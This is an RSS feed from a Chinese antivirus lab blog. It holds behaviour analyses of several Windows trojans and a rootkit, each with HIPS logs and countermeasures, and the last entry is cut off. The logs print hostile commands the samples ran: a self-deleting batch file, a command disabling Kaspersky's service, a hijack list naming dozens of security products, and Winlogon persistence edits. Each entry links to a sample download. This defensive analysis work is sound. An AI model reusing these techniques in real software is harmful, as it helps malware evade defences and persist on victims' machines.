<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[沁妍病毒行为分析室]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[EQSecurity Lab魔法盾官方资讯站]]></description>
<link>http://hi.baidu.com/eqsyssecurity</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[行为分析 Backdoor.Win32.Ceckno.bjq]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/baf6d2232324b6449358077b.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Backdoor.Win32.Ceckno.bjq<br>
NOD32：probably a variant of Win32/Agent.RCW<br>
Rising：Trojan.PSW.Win32.GameOL.nvi<br>
VT扫描时间：2009.12.02 05:39:58 (UTC)<br>
EQS Lab编号：091202332<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：26.5 KB (27,217 字节)<br>
MD5码：447607371E82D54F6D604EF312E7934C<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向system32写入dll
<div class="quote"><blockquote>2009-12-02 13:33:15&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\5\5.exe<br>
文件路径:C:\WINDOWS\system32\msvcrt25.dll<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.dll</blockquote></div>
调用 劫持ie
<div class="quote"><blockquote>2009-12-02 13:33:22&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\5\5.exe<br>
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
触发规则:所有程序规则-&gt;进程保护-&gt;C:\Program Files\Internet Explorer\IEXPLORE.exe<br>
<br>
2009-12-02 13:33:23&#160; &#160; 修改其它进程内存&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\5\5.exe<br>
目标进程:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
触发规则:所有程序规则-&gt;进程保护-&gt;C:\Program Files\Internet Explorer\IEXPLORE.exe<br>
<br>
2009-12-02 13:33:42&#160; &#160; 创建远程线程&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\5\5.exe<br>
目标进程:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
触发规则:所有程序规则-&gt;进程保护-&gt;C:\Program Files\Internet Explorer\IEXPLORE.exe</blockquote></div>
向system32写入exe
<div class="quote"><blockquote>2009-12-02 13:33:46&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\5\5.exe<br>
文件路径:C:\WINDOWS\system32\msvcrty.exe<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.exe</blockquote></div>
修改Userinit启动项
<div class="quote"><blockquote>2009-12-02 13:34:11&#160; &#160; 修改注册表内容&#160; &#160;&#160; &#160;<br>
进程路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE<br>
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon<br>
注册表名称:Userinit<br>
更改后:C:\WINDOWS\system32\userinit.exe,,C:\WINDOWS\system32\msvcrty.exe<br>
更改前:C:\WINDOWS\system32\userinit.exe,<br>
触发规则:所有程序规则-&gt;自动启动-&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</blockquote></div>
自删除
<div class="quote"><blockquote>2009-12-02 13:34:19&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\5\5.exe<br>
文件路径:C:\WINDOWS\system32\cmd.exe<br>
命令行:/c&#160;&#160;del E:\KIA\5\5.exe &gt; nul<br>
触发规则:高优先规则-&gt;In Side-&gt;%systemroot%\system32\cmd.exe</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建dll exe<br>
<br>
修改Userinit启动项<br>
<br>
劫持ie进程<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向系统目录创建dll exe<br>
<br>
使用HIPS阻止程序修改Userinit启动项<br>
<br>
使用HIPS阻止陌生程序劫持ie进程<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-906574-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/baf6d2232324b6449358077b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/baf6d2232324b6449358077b.html#comment">查看评论</a>]]></description>
        <pubDate>2009年12月02日 星期三  13:58</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/baf6d2232324b6449358077b.html</guid>
</item>

<item>
        <title><![CDATA[行为分析 Trojan.Win32.Regrun.dnl]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/a65969fbd0668d284e4aea7b.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Trojan.Win32.Regrun.dnl<br>
NOD32：Win32/Kryptik.BDM.Gen<br>
Rising：Dropper.Win32.Undef.alm<br>
VT扫描时间：2009.12.02 05:10:30 (UTC)<br>
EQS Lab编号：091202331<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：23.5 KB (24,064 字节)<br>
MD5码：11D1131EB5153C15BB1D81D4A50989C6<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后改名复制自身到TEMP目录
<div class="quote"><blockquote>2009-12-02 13:27:16&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\system32\cmd.exe<br>
命令行:/c copy &quot;E:\KIA\2\2.exe&quot; &quot;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe&quot;<br>
触发规则:高优先规则-&gt;In Side-&gt;%systemroot%\system32\cmd.exe</blockquote></div>
调用
<div class="quote"><blockquote>2009-12-02 13:27:25&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\system32\cmd.exe<br>
命令行:/c &quot;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe&quot;<br>
触发规则:高优先规则-&gt;In Side-&gt;%systemroot%\system32\cmd.exe</blockquote></div>
添加系统防火墙放行列表
<div class="quote"><blockquote>2009-12-02 13:27:40&#160; &#160; 创建注册表值&#160; &#160;&#160; &#160;<br>
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe<br>
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess \Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List<br>
注册表名称:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe<br>
触发规则:所有程序规则-&gt;网络相关-&gt;HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\Services\SharedAccess\Parameters\FirewallPolicy*</blockquote></div>
修改Winlogon启动项
<div class="quote"><blockquote>2009-12-02 13:27:47&#160; &#160; 修改注册表内容&#160; &#160;&#160; &#160;<br>
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe<br>
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon<br>
注册表名称:shell<br>
更改后:Explorer.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe<br>
更改前:C:\PROGRA~1\BlackBox\blackbox.exe<br>
触发规则:所有程序规则-&gt;WinLogon-&gt;*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon*</blockquote></div>
下载exe
<div class="quote"><blockquote>2009-12-02 13:28:56&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe<br>
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\system.exe<br>
触发规则:所有程序规则-&gt;Documents and Settings-&gt;?:\Documents and Settings\*.exe</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<span><img border="0" src="http://hiphotos.baidu.com/eqsyssecurity/pic/item/9e80944aeb1aed0c08f7eff6.jpg" small="0" class="blogimg"></span><br>
<div style="position: absolute; display: none;" class="t_attach"><img border="0" class="absmiddle" src="http://bbs.janmeng.com/images/attachicons/image.gif"> <a target="_blank" href="http://bbs.janmeng.com/attachment.php?aid=321998&amp;k=958cfe8dbc2c0969c280db51a63b4440&amp;t=1259733429&amp;nothumb=yes"><strong>Photo2.jpg</strong></a> (58.06 KB)<br>
<div class="t_smallfont">2009-12-2 13:51</div>
</div>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
修改Winlogon启动项<br>
<br>
调用cmd.exe<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序修改Winlogon启动项<br>
<br>
使用HIPS阻止陌生程序调用cmd.exe<br>
<br>
使用HIPS阻止陌生程序添加系统防火墙放行列表<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-906573-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/a65969fbd0668d284e4aea7b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/a65969fbd0668d284e4aea7b.html#comment">查看评论</a>]]></description>
        <pubDate>2009年12月02日 星期三  13:58</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/a65969fbd0668d284e4aea7b.html</guid>
</item>

<item>
        <title><![CDATA[行为分析 Rootkit.Win32.Agent.gyh]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/85ab90367ec0ced7a2cc2b7a.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Rootkit.Win32.Agent.gyh <br>
NOD32：Win32/Agent.OCX <br>
Rising：Dropper.Win32.Undef.nn<br>
VT扫描时间：2009.12.02 05:08:15 (UTC)<br>
EQS Lab编号：091202330<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：37.0 KB (37,888 字节)<br>
MD5码：323A3C29BEBA106654EA26CFBE038B75<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向system32目录写入dll
<div class="quote"><blockquote>2009-12-02 13:24:22&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\BhhD.dll<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.dll</blockquote></div>
向drivers目录写入sys
<div class="quote"><blockquote>2009-12-02 13:24:47&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\drivers\ojbst.sys<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\system32\drivers\*</blockquote></div>
SCM 安装服务或驱动
<div class="quote"><blockquote>2009-12-02 13:24:57&#160; &#160; 访问服务管理器&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
触发规则:所有程序规则-&gt;*<br>
<br>
2009-12-02 13:24:59&#160; &#160; 安装服务或者驱动&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\services.exe<br>
文件路径:C:\WINDOWS\system32\drivers\ojbst.sys<br>
触发规则:所有程序规则-&gt;威胁提示Ⅲ-&gt;%systemroot%\*</blockquote></div>
创建自删除BAT 调用
<div class="quote"><blockquote>2009-12-02 13:25:06&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\9H72J8.bat<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.bat<br>
<br>
2009-12-02 13:25:18&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\1\1.exe<br>
文件路径:C:\WINDOWS\system32\cmd.exe<br>
命令行:/c C:\WINDOWS\system32\9H72J8.bat<br>
触发规则:高优先规则-&gt;In Side-&gt;%systemroot%\system32\cmd.exe<br>
<br>
ping -n 3 127.0.0.1&gt;nul<br>
:Repeat<br>
del &quot;E:\KIA\1\1.exe&quot;<br>
if exist &quot;E:\KIA\1\1.exe&quot; goto Repeat<br>
cd C:\<br>
del %0</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建dll sys<br>
<br>
SCM 安装服务或驱动<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向系统目录创建dll sys<br>
<br>
使用HIPS阻止陌生程序SCM 安装服务或驱动<br>
<br>
使用HIPS阻止陌生程序调用CMD.EXE<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-906572-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/85ab90367ec0ced7a2cc2b7a.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/85ab90367ec0ced7a2cc2b7a.html#comment">查看评论</a>]]></description>
        <pubDate>2009年12月02日 星期三  13:57</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/85ab90367ec0ced7a2cc2b7a.html</guid>
</item>

<item>
        <title><![CDATA[行为分析 Trojan-Downloader.Win32.Geral.msi]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/3db946160e9b775bf2de3274.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Trojan-Downloader.Win32.Geral.msi<br>
NOD32：a variant of Win32/AutoRun.KillAV.D<br>
Rising：Trojan.Win32.Generic.51F1E26E<br>
VT扫描时间：2009.11.29 04:49:34 (UTC)<br>
EQS Lab编号：091129329<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：25.7 KB (26,320 字节)<br>
MD5码：211E0F039906196037C70A2B09377381<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后修改taskmgr.exe
<div class="quote"><blockquote>2009-11-29 13:48:18&#160; &#160; 修改文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\WINDOWS\system32\taskmgr.exe<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅱ-&gt;%systemroot%\*.exe</blockquote></div>
创建PendingFileRenameOperations启动项
<div class="quote"><blockquote>2009-11-29 13:48:28&#160; &#160; 创建注册表值&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager<br>
注册表名称:PendingFileRenameOperations<br>
触发规则:所有程序规则-&gt;自动启动-&gt;*\SYSTEM\ControlSet*\Control\Session Manager</blockquote></div>
向C根目录创建dll 并调用
<div class="quote"><blockquote>2009-11-29 13:49:16&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\tyn.dll<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.dll<br>
<br>
2009-11-29 13:49:38&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\WINDOWS\system32\rundll32.exe<br>
命令行:C:\tyn.dll,RKTV<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\rundll32.exe</blockquote></div>
向字体目录创建sys
<div class="quote"><blockquote>2009-11-29 13:51:01&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
文件路径:C:\WINDOWS\Fonts\pci.sys<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\Fonts\*.sys</blockquote></div>
SCM 安装服务或驱动
<div class="quote"><blockquote>2009-11-29 13:51:08&#160; &#160; 访问服务管理器&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
触发规则:应用程序规则-&gt;父进程威胁提示Ⅲ-&gt;%systemroot%\*<br>
<br>
2009-11-29 14:08:02&#160; &#160; 安装服务或者驱动&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\services.exe<br>
文件路径:C:\WINDOWS\Fonts\pci.sys<br>
触发规则:所有程序规则-&gt;威胁提示Ⅰ-&gt;%systemroot%\Fonts\*</blockquote></div>
删除DLL
<div class="quote"><blockquote>2009-11-29 13:51:14&#160; &#160; 删除文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\tyn.dll<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.dll</blockquote></div>
修改AVP服务
<div class="quote"><blockquote>2009-11-29 14:08:25&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\WINDOWS\system32\cmd.exe<br>
命令行:/c sc config avp start= disabled<br>
触发规则:高优先规则-&gt;In Side-&gt;%systemroot%\system32\cmd.exe</blockquote></div>
加载TEMP目录库文件
<div class="quote"><blockquote>2009-11-29 13:51:46&#160; &#160; 加载库文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\dll29.tmp<br>
触发规则:所有程序规则-&gt;威胁提示Ⅰ-&gt;?:\Documents and Settings\*\Local Settings\Temp\*</blockquote></div>
创建映像劫持
<div class="quote"><blockquote>2009-11-29 13:51:54&#160; &#160; 创建注册表值&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE<br>
注册表名称:[Key]<br>
触发规则:所有程序规则-&gt;安全设置项-&gt;*\SOFTWARE\Microsoft\Windows*\CurrentVersion\Image File Execution Options*<br>
<br>
360upp.EXE 360safeup.EXE 360sd.EXE 360rp.EXE arpfw.EXE ZhuDongFangYu.EXE krnl360svc.EXE 360safe.EXE 360tray.EXE 360safebox.EXE safeboxTray.EXE LiveUpdate360.EXE AvMonitor.EXE Ravservice.EXE RAVTRAY.EXE CCenter.EXE RavMonD.EXE RavMon.EXE IceSword.EXE Iparmor.EXE KVWSC.EXE RavTask.EXE KVMonxp.KXP KVSrvXP.EXE Navapsvc.EXE Nod32kui.EXE nod32krn.EXE ekrn.EXE egui.EXE KRegEx.EXE Frameworkservice.EXE Mmsk.EXE Ast.EXE avp.EXE WOPTILITIES.EXE Regedit.EXE AutoRunKiller.EXE VPC32.EXE VPTRAY.EXE ANTIARP.EXE RAV.EXE KASARP.EXE kwatch.EXE kavstart.EXE KSWebShield.EXE KAVPFW.EXE Runiep.EXE GuardField.EXE GFUpd.EXE Rfwstub.EXE rfwmain.EXE RavStub.EXE ScanFrm.EXE RsAgent.EXE RsMain.EXE Rsaupd.EXE rfwProxy.EXE rfwsrv.EXE SREngLdr.EXE ArSwp.EXE RSTray.EXE TrojanDetector.EXE RSTray.EXE Trojanwall.EXE TrojDie.KXP PFW.EXE HijackThis.EXE AutoRun.EXE KpfwSvc.EXE kissvc.EXE kav32.EXE VsTskMgr.EXE naPrdMgr.EXE ccEvtMgr.EXE VsTskMgr.EXE mcshield.EXE </blockquote></div>
向各盘根目录创建AUTORUN.INF&#160;&#160;PIF
<div class="quote"><blockquote>2009-11-29 13:52:23&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\AUTORUN.INF<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\autorun.inf<br>
<br>
2009-11-29 14:10:03&#160; &#160; 修改文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:C:\ZU.PIF<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.pif<br>
<br>
2009-11-29 14:10:03&#160; &#160; 创建文件&#160; &#160;&#160; &#160;操作:阻止<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:D:\AUTORUN.INF<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\autorun.inf<br>
<br>
2009-11-29 14:10:05&#160; &#160; 创建文件&#160; &#160;&#160; &#160;操作:阻止<br>
进程路径:E:\KIA\3\3.exe<br>
文件路径:D:\ZU.PIF<br>
触发规则:所有程序规则-&gt;文件阻止及保护-&gt;?:\*.pif</blockquote></div>
<strong>联网行为：</strong><br>
<span><img border="0" src="http://hiphotos.baidu.com/eqsyssecurity/pic/item/e9ee8a0f276a5b056159f303.jpg" small="0" class="blogimg"></span><br>
<div style="position: absolute; display: none;" class="t_attach"><img border="0" class="absmiddle" src="http://bbs.janmeng.com/images/attachicons/image.gif"> <a target="_blank" href="http://bbs.janmeng.com/attachment.php?aid=321774&amp;k=a752cf807ea9361337800d07adc95f58&amp;t=1259476816&amp;nothumb=yes"><strong>Photo2.jpg</strong></a> (47.46 KB)<br>
<div class="t_smallfont">2009-11-29 14:36</div>
</div>
<br>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建dll sys<br>
<br>
SCM 安装服务或驱动<br>
<br>
创建映像劫持<br>
<br>
向各盘根目录创建AUTORUN.INF&#160;&#160;PIF<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
使用HIPS阻止陌生程序向系统目录创建dll sys<br>
<br>
使用HIPS阻止程序SCM 安装服务或驱动<br>
<br>
使用HIPS阻止陌生程序创建映像劫持<br>
<br>
使用HIPS阻止陌生程序向各盘根目录创建AUTORUN.INF&#160;&#160;PIF<br>
<br>
使用HIPS阻止陌生程序修改taskmgr.exe<br>
<br>
使用HIPS阻止陌生程序创建PendingFileRenameOperations启动项<br>
<br>
使用HIPS阻止陌生程序调用rundll32.exe&#160;&#160;cmd.exe<br>
</font></div>
<h4>样本下载：http://bbs.janmeng.com/thread-906075-1-1.html</h4> <a href="http://hi.baidu.com/eqsyssecurity/blog/item/3db946160e9b775bf2de3274.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/eqsyssecurity/blog/category/%B7%B4%B2%A1%B6%BE">反病毒</a>&nbsp;<a href="http://hi.baidu.com/eqsyssecurity/blog/item/3db946160e9b775bf2de3274.html#comment">查看评论</a>]]></description>
        <pubDate>2009年11月29日 星期日  14:41</pubDate>
        <category><![CDATA[反病毒]]></category>
        <author><![CDATA[周沁妍]]></author>
		<guid>http://hi.baidu.com/eqsyssecurity/blog/item/3db946160e9b775bf2de3274.html</guid>
</item>

<item>
        <title><![CDATA[[行为分析] Trojan-Downloader.Win32.Mufanom.ghk]]></title>
        <link><![CDATA[http://hi.baidu.com/eqsyssecurity/blog/item/94ab123d53aee3cd9e3d626b.html]]></link>
        <description><![CDATA[
		
		<div class="t_msgfont" >病毒名称：Kaspersky：Trojan-Downloader.Win32.Mufanom.ghk<br>
NOD32：Win32/Cimag.BB <br>
Rising：Trojan.Win32.Generic.51F238D5<br>
VT扫描时间：2009.11.29 04:46:07 (UTC)<br>
EQS Lab编号：091129328<br>
EQS Lab地址：<a target="_blank" href="../../eqsyssecurity">http://hi.baidu.com/eqsyssecurity</a><br>
病毒大小：51.5 KB (52,736 字节)<br>
MD5码：6EE09A6A01FF745B4684F730DFE68AFF<br>
伪造数字签名：-<br>
测试平台： WinXP SP3系统&#160; &#160;&#160; &#160; EQSecurity（HIPS） 实机 <br>
测试说明：<a target="_blank" href="../../eqsyssecurity/blog/item/f0eda3f08e5b15c57831aa7c.html">http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html</a><br>
<br>
<strong>病毒行为：</strong><br>
注：本分析可能为多次运行测试结果汇总&#160;&#160;因此时间可能会混乱<br>
<br>
<br>
运行后向windows目录写入dll&#160;&#160;并调用
<div class="quote"><blockquote>2009-11-29 13:43:53&#160; &#160; 创建文件&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\nwuicrv.dll<br>
触发规则:所有程序规则-&gt;系统核心目录Ⅰ-&gt;%systemroot%\*.dll<br>
<br>
2009-11-29 13:44:04&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:E:\KIA\2\2.exe<br>
文件路径:C:\WINDOWS\system32\rundll32.exe<br>
命令行:&quot;C:\WINDOWS\nwuicrv.dll&quot;,Startup<br>
触发规则:所有程序规则-&gt;系统工具-&gt;%systemroot%\system32\rundll32.exe</blockquote></div>
修改LSA安全设置
<div class="quote"><blockquote>2009-11-29 13:44:20&#160; &#160; 修改注册表内容&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa<br>
注册表名称:Notification Packages<br>
更改后:scecli<br>
触发规则:所有程序规则-&gt;安全设置项-&gt;HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\Control\Lsa</blockquote></div>
调用dll
<div class="quote"><blockquote>2009-11-29 13:44:50&#160; &#160; 运行应用程序&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
文件路径:C:\WINDOWS\system32\rundll32.exe<br>
命令行:&quot;C:\WINDOWS\nwuicrv.dll&quot;,iep<br>
触发规则:应用程序规则-&gt;系统程序-&gt;%systemroot%\system32\rundll32.exe-&gt;%systemroot%\system32\rundll32.exe</blockquote></div>
安装钩子
<div class="quote"><blockquote>2009-11-29 13:45:11&#160; &#160; 安装全局钩子&#160; &#160;&#160; &#160;<br>
进程路径:C:\WINDOWS\system32\rundll32.exe<br>
文件路径:C:\WINDOWS\nwuicrv.dll<br>
钩子类型:WH_GETMESSAGE<br>
触发规则:所有程序规则-&gt;威胁提示Ⅱ-&gt;%systemroot%\*</blockquote></div>
<strong>联网行为：</strong><br>
<br>
<span><img border="0" src="http://hiphotos.baidu.com/eqsyssecurity/pic/item/8ebc091b8a7b97faac6e7506.jpg" small="0" class="blogimg"></span><br>
<div style="position: absolute; display: none;" class="t_attach"><img border="0" class="absmiddle" src="http://bbs.janmeng.com/images/attachicons/image.gif"> <a target="_blank" href="http://bbs.janmeng.com/attachment.php?aid=321772&amp;k=6eae0b6fa22dc8f51a16a084cffd621f&amp;t=1259476756&amp;nothumb=yes"><strong>Photo1.jpg</strong></a> (48.05 KB)<br>
<div class="t_smallfont">2009-11-29 14:28</div>
</div>
<br>
<br>
<br>
<strong>关键行为：</strong><br>
<font color="Blue"><br>
向系统目录创建dll<br>
<br>
修改LSA注册表<br>
<br>
安装钩子<br>
</font><br>
<br>
<strong>防范对策：</strong><br>
<br>
<font color="Red"><br>
